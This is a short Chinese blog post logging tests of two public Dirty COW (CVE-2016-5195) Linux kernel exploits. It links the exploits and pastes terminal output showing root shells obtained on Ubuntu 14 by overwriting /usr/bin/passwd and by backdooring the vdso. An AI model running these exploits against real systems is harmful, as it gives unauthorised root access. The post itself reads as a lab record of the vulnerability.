【CVE-2016-5195】Dirtycow

  1. 1. 概述
  2. 2. EXP
    1. 2.0.1. https://www.exploit-db.com/exploits/40616/
    2. 2.0.2. https://github.com/scumjr/dirtycow-vdso

概述

最近出来的dirtycow,影响版本:Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复),用网上的EXP试了一下,记录一下过程

EXP

https://www.exploit-db.com/exploits/40616/

这个EXP是exploitdb上的,但是容易造成系统崩溃,成功后会返回一个root权限的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
okami@ubuntu14:~$ ./dirtycow
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 47032
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@ubuntu14:/home/okami# id
uid=0(root) gid=1000(okami) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(okami)
root@ubuntu14:/home/okami# whoami
root
root@ubuntu14:/home/okami#

https://github.com/scumjr/dirtycow-vdso

这个EXP不会出现系统崩溃,但是作者本人说不适用于所有linux版本,不过试验了一下,ubuntu14 16 centOS7都可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
okami@ubuntu14:~$ ./0xdeadbeef
[*] exploit: patch 1/2
[*] vdso successfully backdoored
[*] exploit: patch 2/2
[*] vdso successfully backdoored
[*] waiting for reverse connect shell...
[*] enjoy!
[*] restore: patch 2/2
[*] vdso successfully restored
[*] restore: patch 1/2
[*] vdso successfully restored
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

注意这里有一步是waiting for reverse connect shell…,需要一点时间,成功后有root权限的shell